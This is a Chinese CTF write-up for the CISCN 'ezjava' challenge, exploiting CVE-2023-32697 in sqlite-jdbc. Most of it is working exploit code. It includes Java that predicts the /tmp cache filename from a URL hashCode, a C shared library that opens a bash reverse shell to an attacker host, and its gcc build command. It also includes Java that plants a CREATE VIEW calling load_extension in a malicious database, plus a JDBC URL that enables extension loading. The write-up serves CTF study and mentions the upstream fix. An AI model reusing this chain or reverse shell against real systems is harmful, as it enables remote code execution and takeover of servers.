CISCN ezjava

一般来说打java的JDBC都是MySQL或是PostgreSQL，这两个条件比较容易触发，但是这里虽然能控制JDBC但是没有利用链就打不了，回到题目

很明显可以知道这里定义了四种JDBC的连接方式，第三中就是Sqlite，跟进sqliteDatasourceConnector.getTableContent

SQL语言可是可控的，往上看到SqliteDatasourceConnector方法

这个构造方法开启了load_extension功能，也就是可以加载文件，其实这里开不开都无所谓，因为JDBC是可以直接开启load_extension的

最早的利用文章是这里：HITB SECCONF全英文的PDF，更推荐这篇，CVE-2023-32697——sqlite jdbc RCE

利用思路很简单，就是通过JDBC来写入恶意文件，再通过控制SQL语句加载恶意文件实现RCE，先看写入恶意文件

当我们用JDBC远程加载一个恶意文件时，Sqlite会缓存这个恶意文件，并将其保存在/tmp目录下，重命名为sqlite-jdbc-tmp-??????这个命名我们是可以预测到的，就是传入URL的hashCode

package org.example;

import java.net.URL;

public class App {
    public static void main(String[] args) throws Exception{
        String url = "http://ip:8001/exp.so";
        Integer hash = new URL(url).hashCode();
        String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", Integer.valueOf(hash));
        System.out.println(dbFileName);
    }
}

编写so文件，这里用的boogipop师傅给出的代码

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

void flag() {{
    system("bash -c 'bash -i >& /dev/tcp/ip/8888 <&1'");
}}

void space() {{
    static char waste[500 * 1024] = {{2}};
}}

编译为so文件

gcc -shared -fPIC exp.c -o exp.so

下面就来到最难的地方，虽然我们能够控制tableName，但是想要执行load_extension肯定是不行的，需要用到CREATE VIEW来劫持select的方法，执行CREATE VIEW之后，db文件会插入CREATE VIEW语句(DDL)，因此形成了一个恶意数据库文件，这时再通过load_extension函数加载so文件中的恶意代码

String sql = "CREATE VIEW security as SELECT ( SELECT load_extension('/tmp/sqlite-jdbc-tmp--1726875147.db','flag'));";

生成一个恶意的db文件来加载/tmp/sqlite-jdbc-tmp--1726875147.db

package org.example;

import java.io.File;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;

public class Main {
    public static void main(String[] args) {
        try {
            String dbFile = "poc.db";
            File file = new File(dbFile);
            Class.forName("org.sqlite.JDBC");
            Connection conn = DriverManager.getConnection("jdbc:sqlite:"+dbFile);

            System.out.println("Opened database successfully");
            String sql = "CREATE VIEW security as SELECT ( SELECT load_extension('/tmp/sqlite-jdbc-tmp--1727938645.db','flag'));";  //向其中插⼊传⼊的三个参数
            PreparedStatement preStmt = conn.prepareStatement(sql);
            preStmt.executeUpdate();
            preStmt.close();
            conn.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

题目环境已经开启了load_extension，如果没有开启，就再添加一个步骤，用JDBC配置load_extension，加载恶意db文件的缓存db文件

jdbc:sqlite:file:/tmp/sqlite-jdbc-tmp-hashcode.db?enable_load_extension=true

总的来说利用链很简单，难点更多的在于执行SQL语句哪里，要通过CREATE VIEW劫持SELECT，相较于其他两种常见的JDBC反序列化，Sqlite jdbc要实现RCE就比较苛刻了要同时满足控制JDBC和SQL语句

官方对于这个RCE的修复也特别简单，直接把缓存文件的文件名生成方法改了，从原来的hashCode修改为randomUUID，这样即使能控制SQL语句，也会因为无法定位恶意文件而不能RCE，该说不说这确实是最简单暴力的方法